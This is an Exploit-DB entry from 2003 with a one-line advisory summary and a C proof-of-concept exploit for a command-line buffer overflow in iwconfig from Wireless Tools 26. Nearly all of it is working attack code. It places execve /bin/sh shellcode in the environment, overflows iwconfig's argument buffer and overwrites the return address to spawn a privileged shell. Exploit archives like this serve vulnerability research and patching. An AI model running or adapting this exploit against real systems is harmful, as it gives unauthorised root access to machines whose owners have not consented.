Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (1)

EDB-ID:

23299

Author:

axis

Type:

local

Platform:

Linux

Published:

2003-10-27

// source: https://www.securityfocus.com/bid/8901/info

A problem has been identified in the iwconfig program when handling strings on the commandline. Because of this, a local attacker may be able to gain elevated privileges. 

Exploit:
/* PST_iwconfig
   /sbin/iwconfig proof of concept exploit
   coded by aXis@ph4nt0m.net
   Ph4nt0m Security Team
   http://www.ph4nt0m.net
   just for fun
*/

#include<stdio.h>
#include<string.h>
#include<unistd.h>

/* Copyright (c) Ramon de Carvalho Valle July 2003 */
/* x86/linux shellcode */

char shellcode[]= /* 24 bytes */
    "\x31\xc0" /* xorl %eax,%eax */
    "\x50" /* pushl %eax */
    "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
    "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
    "\x89\xe3" /* movl %esp,%ebx */
    "\x50" /* pushl %eax */
    "\x53" /* pushl %ebx */
    "\x89\xe1" /* movl %esp,%ecx */
    "\x99" /* cltd */
    "\xb0\x0b" /* movb $0x0b,%al */
    "\xcd\x80"; /* int $0x80 */


int main(int argc,char **argv){
   char buf[96];
   unsigned long ret;
   int i;

   char *prog[]={"/sbin/iwconfig",buf,NULL};
   char *env[]={"HOME=/",shellcode,NULL};

   ret=0xc0000000-strlen(shellcode)-strlen(prog[0])-0x06;
   printf("use ret addr: 0x%x\n",ret);

   memset(buf,0x41,sizeof(buf));
   memcpy(&buf[92],&ret,4);

   execve(prog[0],prog,env);

  }